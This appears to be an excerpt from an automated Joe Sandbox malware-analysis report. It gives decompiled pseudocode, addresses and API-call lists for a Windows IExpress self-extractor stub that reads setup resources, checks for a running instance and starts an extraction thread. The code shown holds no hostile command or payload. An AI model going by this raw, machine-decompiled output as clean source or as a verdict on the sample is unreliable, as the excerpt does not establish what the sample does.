                                                                                                                                                                                                      0x000e33a4
                                                                                                                                                                                                      0x000e33ab
                                                                                                                                                                                                      0x000e33b6
                                                                                                                                                                                                      0x000e33be
                                                                                                                                                                                                      0x000e33c3
                                                                                                                                                                                                      0x000e33c5
                                                                                                                                                                                                      0x000e3435
                                                                                                                                                                                                      0x000e3437
                                                                                                                                                                                                      0x000e3437
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e3437
                                                                                                                                                                                                      0x000e33c7
                                                                                                                                                                                                      0x000e33c9
                                                                                                                                                                                                      0x000e33cc
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e33cc
                                                                                                                                                                                                      0x000e33ad
                                                                                                                                                                                                      0x000e33b4
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e33b4
                                                                                                                                                                                                      0x000e3398
                                                                                                                                                                                                      0x000e3399
                                                                                                                                                                                                      0x000e339b
                                                                                                                                                                                                      0x000e339c
                                                                                                                                                                                                      0x000e339d
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e339d
                                                                                                                                                                                                      0x000e334c
                                                                                                                                                                                                      0x000e3351
                                                                                                                                                                                                      0x000e3354
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e335c
                                                                                                                                                                                                      0x000e3362
                                                                                                                                                                                                      0x000e3364
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e3366
                                                                                                                                                                                                      0x000e3367
                                                                                                                                                                                                      0x000e3369
                                                                                                                                                                                                      0x000e336a
                                                                                                                                                                                                      0x000e336b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e336b
                                                                                                                                                                                                      0x000e331c
                                                                                                                                                                                                      0x000e3323
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e3329
                                                                                                                                                                                                      0x000e332b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e332b
                                                                                                                                                                                                      0x000e324c
                                                                                                                                                                                                      0x000e324c
                                                                                                                                                                                                      0x000e324f
                                                                                                                                                                                                      0x000e32c8
                                                                                                                                                                                                      0x000e32ce
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e32ce
                                                                                                                                                                                                      0x000e3251
                                                                                                                                                                                                      0x000e3256
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e3271
                                                                                                                                                                                                      0x000e3277
                                                                                                                                                                                                      0x000e3279
                                                                                                                                                                                                      0x000e3298
                                                                                                                                                                                                      0x000e329d
                                                                                                                                                                                                      0x000e329f
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e32b0
                                                                                                                                                                                                      0x000e32b6
                                                                                                                                                                                                      0x000e32b8
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e32be
                                                                                                                                                                                                      0x000e3280
                                                                                                                                                                                                      0x000e3289
                                                                                                                                                                                                      0x000e328e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e328e
                                                                                                                                                                                                      0x000e327b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e327b
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • LoadStringA.USER32(000003E8,000E8598,00000200), ref: 000E3271
                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 000E33E2
                                                                                                                                                                                                      • SetWindowTextA.USER32(?,cent), ref: 000E33F7
                                                                                                                                                                                                      • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 000E3410
                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000836), ref: 000E3426
                                                                                                                                                                                                      • EnableWindow.USER32(00000000), ref: 000E342D
                                                                                                                                                                                                      • EndDialog.USER32(?,00000000), ref: 000E343F
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$cent
                                                                                                                                                                                                      • API String ID: 2418873061-647987826
                                                                                                                                                                                                      • Opcode ID: d0a04679ad355a6385c70b45c52cce406155d4ad9475fb76883c11596892af7c
                                                                                                                                                                                                      • Instruction ID: da00334470451651dafa44282feea9aa32cf9a46239cca3778a86f619e6e7dc8
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d0a04679ad355a6385c70b45c52cce406155d4ad9475fb76883c11596892af7c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3C51E6703412C07EF7615B375C8CFBF6D999B8AF55F504028F645BB1D1CAA89F019261
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 93%
                                                                                                                                                                                                      			E000E2CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t13;
                                                                                                                                                                                                      				void* _t20;
                                                                                                                                                                                                      				void* _t23;
                                                                                                                                                                                                      				void* _t27;
                                                                                                                                                                                                      				struct HRSRC__* _t31;
                                                                                                                                                                                                      				intOrPtr _t33;
                                                                                                                                                                                                      				void* _t43;
                                                                                                                                                                                                      				void* _t48;
                                                                                                                                                                                                      				signed int _t65;
                                                                                                                                                                                                      				struct HINSTANCE__* _t66;
                                                                                                                                                                                                      				signed int _t67;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t13 =  *0xe8004; // 0xb7c20988
                                                                                                                                                                                                      				_v8 = _t13 ^ _t67;
                                                                                                                                                                                                      				_t65 = 0;
                                                                                                                                                                                                      				_t66 = __ecx;
                                                                                                                                                                                                      				_t48 = __edx;
                                                                                                                                                                                                      				 *0xe9a3c = __ecx;
                                                                                                                                                                                                      				memset(0xe9140, 0, 0x8fc);
                                                                                                                                                                                                      				memset(0xe8a20, 0, 0x32c);
                                                                                                                                                                                                      				memset(0xe88c0, 0, 0x104);
                                                                                                                                                                                                      				 *0xe93ec = 1;
                                                                                                                                                                                                      				_t20 = E000E468F("TITLE", 0xe9154, 0x7f);
                                                                                                                                                                                                      				if(_t20 == 0 || _t20 > 0x80) {
                                                                                                                                                                                                      					_t64 = 0x4b1;
                                                                                                                                                                                                      					goto L32;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t27 = CreateEventA(0, 1, 1, 0);
                                                                                                                                                                                                      					 *0xe858c = _t27;
                                                                                                                                                                                                      					SetEvent(_t27);
                                                                                                                                                                                                      					_t64 = 0xe9a34;
                                                                                                                                                                                                      					if(E000E468F("EXTRACTOPT", 0xe9a34, 4) != 0) {
                                                                                                                                                                                                      						if(( *0xe9a34 & 0x000000c0) == 0) {
                                                                                                                                                                                                      							L12:
                                                                                                                                                                                                      							 *0xe9120 =  *0xe9120 & _t65;
                                                                                                                                                                                                      							if(E000E5C9E(_t48, _t48, _t65, _t66) != 0) {
                                                                                                                                                                                                      								if( *0xe8a3a == 0) {
                                                                                                                                                                                                      									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
                                                                                                                                                                                                      									if(_t31 != 0) {
                                                                                                                                                                                                      										_t65 = LoadResource(_t66, _t31);
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									if( *0xe8184 != 0) {
                                                                                                                                                                                                      										__imp__#17();
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									if( *0xe8a24 == 0) {
                                                                                                                                                                                                      										_t57 = _t65;
                                                                                                                                                                                                      										if(E000E36EE(_t65) == 0) {
                                                                                                                                                                                                      											goto L33;
                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                      											_t33 =  *0xe9a40; // 0x3
                                                                                                                                                                                                      											_t48 = 1;
                                                                                                                                                                                                      											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
                                                                                                                                                                                                      												if(( *0xe9a34 & 0x00000100) == 0 || ( *0xe8a38 & 0x00000001) != 0 || E000E18A3(_t64, _t66) != 0) {
                                                                                                                                                                                                      													goto L30;
                                                                                                                                                                                                      												} else {
                                                                                                                                                                                                      													_t64 = 0x7d6;
                                                                                                                                                                                                      													if(E000E6517(_t57, 0x7d6, _t34, E000E19E0, 0x547, 0x83e) != 0x83d) {
                                                                                                                                                                                                      														goto L33;
                                                                                                                                                                                                      													} else {
                                                                                                                                                                                                      														goto L30;
                                                                                                                                                                                                      													}
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                      												L30:
                                                                                                                                                                                                      												_t23 = _t48;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										_t23 = 1;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									E000E2390(0xe8a3a);
                                                                                                                                                                                                      									goto L33;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_t64 = 0x520;
                                                                                                                                                                                                      								L32:
                                                                                                                                                                                                      								E000E44B9(0, _t64, 0, 0, 0x10, 0);
                                                                                                                                                                                                      								goto L33;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t64 =  &_v268;
                                                                                                                                                                                                      							if(E000E468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
                                                                                                                                                                                                      								goto L3;
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_t43 = CreateMutexA(0, 1,  &_v268);
                                                                                                                                                                                                      								 *0xe8588 = _t43;
                                                                                                                                                                                                      								if(_t43 == 0 || GetLastError() != 0xb7) {
                                                                                                                                                                                                      									goto L12;
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									if(( *0xe9a34 & 0x00000080) == 0) {
                                                                                                                                                                                                      										_t64 = 0x524;
                                                                                                                                                                                                      										if(E000E44B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
                                                                                                                                                                                                      											goto L12;
                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                      											goto L11;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										_t64 = 0x54b;
                                                                                                                                                                                                      										E000E44B9(0, 0x54b, "cent", 0, 0x10, 0);
                                                                                                                                                                                                      										L11:
                                                                                                                                                                                                      										CloseHandle( *0xe8588);
                                                                                                                                                                                                      										 *0xe9124 = 0x800700b7;
                                                                                                                                                                                                      										goto L33;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						L3:
                                                                                                                                                                                                      						_t64 = 0x4b1;
                                                                                                                                                                                                      						E000E44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                      						 *0xe9124 = 0x80070714;
                                                                                                                                                                                                      						L33:
                                                                                                                                                                                                      						_t23 = 0;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E000E6CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
                                                                                                                                                                                                      			}



















                                                                                                                                                                                                      0x000e2cb5
                                                                                                                                                                                                      0x000e2cbc
                                                                                                                                                                                                      0x000e2cc7
                                                                                                                                                                                                      0x000e2cc9
                                                                                                                                                                                                      0x000e2cd1
                                                                                                                                                                                                      0x000e2cd3
                                                                                                                                                                                                      0x000e2cd9
                                                                                                                                                                                                      0x000e2ce9
                                                                                                                                                                                                      0x000e2cf9
                                                                                                                                                                                                      0x000e2d0e
                                                                                                                                                                                                      0x000e2d15
                                                                                                                                                                                                      0x000e2d1c
                                                                                                                                                                                                      0x000e2ef3
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e2d2d
                                                                                                                                                                                                      0x000e2d34
                                                                                                                                                                                                      0x000e2d3b
                                                                                                                                                                                                      0x000e2d40
                                                                                                                                                                                                      0x000e2d48
                                                                                                                                                                                                      0x000e2d59
                                                                                                                                                                                                      0x000e2d84
                                                                                                                                                                                                      0x000e2e1f
                                                                                                                                                                                                      0x000e2e1f
                                                                                                                                                                                                      0x000e2e2e
                                                                                                                                                                                                      0x000e2e41
                                                                                                                                                                                                      0x000e2e5a
                                                                                                                                                                                                      0x000e2e62
                                                                                                                                                                                                      0x000e2e6c
                                                                                                                                                                                                      0x000e2e6c
                                                                                                                                                                                                      0x000e2e75
                                                                                                                                                                                                      0x000e2e77
                                                                                                                                                                                                      0x000e2e77
                                                                                                                                                                                                      0x000e2e84
                                                                                                                                                                                                      0x000e2e8b
                                                                                                                                                                                                      0x000e2e94
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e2e96
                                                                                                                                                                                                      0x000e2e96
                                                                                                                                                                                                      0x000e2e9e
                                                                                                                                                                                                      0x000e2ea2
                                                                                                                                                                                                      0x000e2eba
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e2ece
                                                                                                                                                                                                      0x000e2ede
                                                                                                                                                                                                      0x000e2eed
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e2eed
                                                                                                                                                                                                      0x000e2eef
                                                                                                                                                                                                      0x000e2eef
                                                                                                                                                                                                      0x000e2eef
                                                                                                                                                                                                      0x000e2eef
                                                                                                                                                                                                      0x000e2ea2
                                                                                                                                                                                                      0x000e2e86
                                                                                                                                                                                                      0x000e2e88
                                                                                                                                                                                                      0x000e2e88
                                                                                                                                                                                                      0x000e2e43
                                                                                                                                                                                                      0x000e2e48
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e2e48
                                                                                                                                                                                                      0x000e2e30
                                                                                                                                                                                                      0x000e2e30
                                                                                                                                                                                                      0x000e2ef8
                                                                                                                                                                                                      0x000e2f01
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e2f01
                                                                                                                                                                                                      0x000e2d8a
                                                                                                                                                                                                      0x000e2d8f
                                                                                                                                                                                                      0x000e2da1
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e2da3
                                                                                                                                                                                                      0x000e2dae
                                                                                                                                                                                                      0x000e2db4
                                                                                                                                                                                                      0x000e2dbb
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e2dca
                                                                                                                                                                                                      0x000e2dd3
                                                                                                                                                                                                      0x000e2df5
                                                                                                                                                                                                      0x000e2e02
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e2dd5
                                                                                                                                                                                                      0x000e2dde
                                                                                                                                                                                                      0x000e2de3
                                                                                                                                                                                                      0x000e2e04
                                                                                                                                                                                                      0x000e2e0a
                                                                                                                                                                                                      0x000e2e10
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e2e10
                                                                                                                                                                                                      0x000e2dd3
                                                                                                                                                                                                      0x000e2dbb
                                                                                                                                                                                                      0x000e2da1
                                                                                                                                                                                                      0x000e2d5b
                                                                                                                                                                                                      0x000e2d5b
                                                                                                                                                                                                      0x000e2d5d
                                                                                                                                                                                                      0x000e2d69
                                                                                                                                                                                                      0x000e2d6e
                                                                                                                                                                                                      0x000e2f06
                                                                                                                                                                                                      0x000e2f06
                                                                                                                                                                                                      0x000e2f06
                                                                                                                                                                                                      0x000e2d59
                                                                                                                                                                                                      0x000e2f18

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • memset.MSVCRT ref: 000E2CD9
                                                                                                                                                                                                      • memset.MSVCRT ref: 000E2CE9
                                                                                                                                                                                                      • memset.MSVCRT ref: 000E2CF9
                                                                                                                                                                                                        • Part of subcall function 000E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000E46A0
                                                                                                                                                                                                        • Part of subcall function 000E468F: SizeofResource.KERNEL32(00000000,00000000,?,000E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000E46A9
                                                                                                                                                                                                        • Part of subcall function 000E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000E46C3
                                                                                                                                                                                                        • Part of subcall function 000E468F: LoadResource.KERNEL32(00000000,00000000,?,000E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000E46CC
                                                                                                                                                                                                        • Part of subcall function 000E468F: LockResource.KERNEL32(00000000,?,000E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000E46D3
                                                                                                                                                                                                        • Part of subcall function 000E468F: memcpy_s.MSVCRT ref: 000E46E5
                                                                                                                                                                                                        • Part of subcall function 000E468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 000E46EF
                                                                                                                                                                                                      • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000E2D34
                                                                                                                                                                                                      • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 000E2D40
                                                                                                                                                                                                      • CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 000E2DAE
                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 000E2DBD
                                                                                                                                                                                                      • CloseHandle.KERNEL32(cent,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 000E2E0A
                                                                                                                                                                                                        • Part of subcall function 000E44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 000E4518
                                                                                                                                                                                                        • Part of subcall function 000E44B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 000E4554
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
                                                                                                                                                                                                      • String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$cent
                                                                                                                                                                                                      • API String ID: 1002816675-2654900392
                                                                                                                                                                                                      • Opcode ID: 22d85b46905d14a1580c40c87d1c720d3360891caa6031eedc4f9fabd0ca47ba
                                                                                                                                                                                                      • Instruction ID: b5aea59c759ae6a0da7696a58412603dba75cdf254a5bb2aa120be233d6d0ab4
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 22d85b46905d14a1580c40c87d1c720d3360891caa6031eedc4f9fabd0ca47ba
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C951B7703403D16EF764AB279D8ABBA26DDDB85B00F044039F645F92D2DAB88C419756
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 81%
                                                                                                                                                                                                      			E000E34F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                      				void* _t9;
                                                                                                                                                                                                      				void* _t12;
                                                                                                                                                                                                      				void* _t13;
                                                                                                                                                                                                      				void* _t17;
                                                                                                                                                                                                      				void* _t23;
                                                                                                                                                                                                      				void* _t25;
                                                                                                                                                                                                      				struct HWND__* _t35;
                                                                                                                                                                                                      				struct HWND__* _t38;
                                                                                                                                                                                                      				void* _t39;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t9 = _a8 - 0x10;
                                                                                                                                                                                                      				if(_t9 == 0) {
                                                                                                                                                                                                      					__eflags = 1;
                                                                                                                                                                                                      					L19:
                                                                                                                                                                                                      					_push(0);
                                                                                                                                                                                                      					 *0xe91d8 = 1;
                                                                                                                                                                                                      					L20:
                                                                                                                                                                                                      					_push(_a4);
                                                                                                                                                                                                      					L21:
                                                                                                                                                                                                      					EndDialog();
                                                                                                                                                                                                      					L22:
                                                                                                                                                                                                      					return 1;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_push(1);
                                                                                                                                                                                                      				_pop(1);
                                                                                                                                                                                                      				_t12 = _t9 - 0xf2;
                                                                                                                                                                                                      				if(_t12 == 0) {
                                                                                                                                                                                                      					__eflags = _a12 - 0x1b;
                                                                                                                                                                                                      					if(_a12 != 0x1b) {
                                                                                                                                                                                                      						goto L22;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					goto L19;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t13 = _t12 - 0xe;
                                                                                                                                                                                                      				if(_t13 == 0) {
                                                                                                                                                                                                      					_t35 = _a4;
                                                                                                                                                                                                      					 *0xe8584 = _t35;
                                                                                                                                                                                                      					E000E43D0(_t35, GetDesktopWindow());
                                                                                                                                                                                                      					__eflags =  *0xe8184; // 0x1
                                                                                                                                                                                                      					if(__eflags != 0) {
                                                                                                                                                                                                      						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
                                                                                                                                                                                                      						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					SetWindowTextA(_t35, "cent");
                                                                                                                                                                                                      					_t17 = CreateThread(0, 0, E000E4FE0, 0, 0, 0xe8798);
                                                                                                                                                                                                      					 *0xe879c = _t17;
                                                                                                                                                                                                      					__eflags = _t17;
                                                                                                                                                                                                      					if(_t17 != 0) {
                                                                                                                                                                                                      						goto L22;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						E000E44B9(_t35, 0x4b8, 0, 0, 0x10, 0);
                                                                                                                                                                                                      						_push(0);
                                                                                                                                                                                                      						_push(_t35);
                                                                                                                                                                                                      						goto L21;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t23 = _t13 - 1;
                                                                                                                                                                                                      				if(_t23 == 0) {
                                                                                                                                                                                                      					__eflags = _a12 - 2;
                                                                                                                                                                                                      					if(_a12 != 2) {
                                                                                                                                                                                                      						goto L22;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					ResetEvent( *0xe858c);
                                                                                                                                                                                                      					_t38 =  *0xe8584; // 0x0
                                                                                                                                                                                                      					_t25 = E000E44B9(_t38, 0x4b2, 0xe1140, 0, 0x20, 4);
                                                                                                                                                                                                      					__eflags = _t25 - 6;
                                                                                                                                                                                                      					if(_t25 == 6) {
                                                                                                                                                                                                      						L11:
                                                                                                                                                                                                      						 *0xe91d8 = 1;
                                                                                                                                                                                                      						SetEvent( *0xe858c);
                                                                                                                                                                                                      						_t39 =  *0xe879c; // 0x0
                                                                                                                                                                                                      						E000E3680(_t39);
                                                                                                                                                                                                      						_push(0);
                                                                                                                                                                                                      						goto L20;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					__eflags = _t25 - 1;
                                                                                                                                                                                                      					if(_t25 == 1) {
                                                                                                                                                                                                      						goto L11;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					SetEvent( *0xe858c);
                                                                                                                                                                                                      					goto L22;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(_t23 == 0xe90) {
                                                                                                                                                                                                      					TerminateThread( *0xe879c, 0);
                                                                                                                                                                                                      					EndDialog(_a4, _a12);
                                                                                                                                                                                                      					return 1;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return 0;
                                                                                                                                                                                                      			}












                                                                                                                                                                                                      0x000e34fb
                                                                                                                                                                                                      0x000e34fe
                                                                                                                                                                                                      0x000e3665
                                                                                                                                                                                                      0x000e3666
                                                                                                                                                                                                      0x000e3666
                                                                                                                                                                                                      0x000e3668
                                                                                                                                                                                                      0x000e366e
                                                                                                                                                                                                      0x000e366e
                                                                                                                                                                                                      0x000e3671
                                                                                                                                                                                                      0x000e3671
                                                                                                                                                                                                      0x000e3677
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e3677
                                                                                                                                                                                                      0x000e3504
                                                                                                                                                                                                      0x000e3506
                                                                                                                                                                                                      0x000e3507
                                                                                                                                                                                                      0x000e350c
                                                                                                                                                                                                      0x000e365b
                                                                                                                                                                                                      0x000e365f
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e3661
                                                                                                                                                                                                      0x000e3512
                                                                                                                                                                                                      0x000e3515
                                                                                                                                                                                                      0x000e35be
                                                                                                                                                                                                      0x000e35c1
                                                                                                                                                                                                      0x000e35d1
                                                                                                                                                                                                      0x000e35d8
                                                                                                                                                                                                      0x000e35de
                                                                                                                                                                                                      0x000e35f8
                                                                                                                                                                                                      0x000e3617
                                                                                                                                                                                                      0x000e3617
                                                                                                                                                                                                      0x000e3623
                                                                                                                                                                                                      0x000e3637
                                                                                                                                                                                                      0x000e363d
                                                                                                                                                                                                      0x000e3642
                                                                                                                                                                                                      0x000e3644
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e3646
                                                                                                                                                                                                      0x000e3652
                                                                                                                                                                                                      0x000e3657
                                                                                                                                                                                                      0x000e3658
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e3658
                                                                                                                                                                                                      0x000e3644
                                                                                                                                                                                                      0x000e351b
                                                                                                                                                                                                      0x000e351d
                                                                                                                                                                                                      0x000e354f
                                                                                                                                                                                                      0x000e3553
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e355f
                                                                                                                                                                                                      0x000e3565
                                                                                                                                                                                                      0x000e357c
                                                                                                                                                                                                      0x000e3581
                                                                                                                                                                                                      0x000e3584
                                                                                                                                                                                                      0x000e359b
                                                                                                                                                                                                      0x000e35a1
                                                                                                                                                                                                      0x000e35a7
                                                                                                                                                                                                      0x000e35ad
                                                                                                                                                                                                      0x000e35b3
                                                                                                                                                                                                      0x000e35b8
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e35b8
                                                                                                                                                                                                      0x000e3586
                                                                                                                                                                                                      0x000e3588
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e3590
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e3590
                                                                                                                                                                                                      0x000e3524
                                                                                                                                                                                                      0x000e3535
                                                                                                                                                                                                      0x000e3541
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e3549
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • TerminateThread.KERNEL32(00000000), ref: 000E3535
                                                                                                                                                                                                      • EndDialog.USER32(?,?), ref: 000E3541
                                                                                                                                                                                                      • ResetEvent.KERNEL32 ref: 000E355F
                                                                                                                                                                                                      • SetEvent.KERNEL32(000E1140,00000000,00000020,00000004), ref: 000E3590
                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 000E35C7
                                                                                                                                                                                                      • GetDlgItem.USER32(?,0000083B), ref: 000E35F1
                                                                                                                                                                                                      • SendMessageA.USER32(00000000), ref: 000E35F8
                                                                                                                                                                                                      • GetDlgItem.USER32(?,0000083B), ref: 000E3610
                                                                                                                                                                                                      • SendMessageA.USER32(00000000), ref: 000E3617
                                                                                                                                                                                                      • SetWindowTextA.USER32(?,cent), ref: 000E3623
                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_00004FE0,00000000,00000000,000E8798), ref: 000E3637
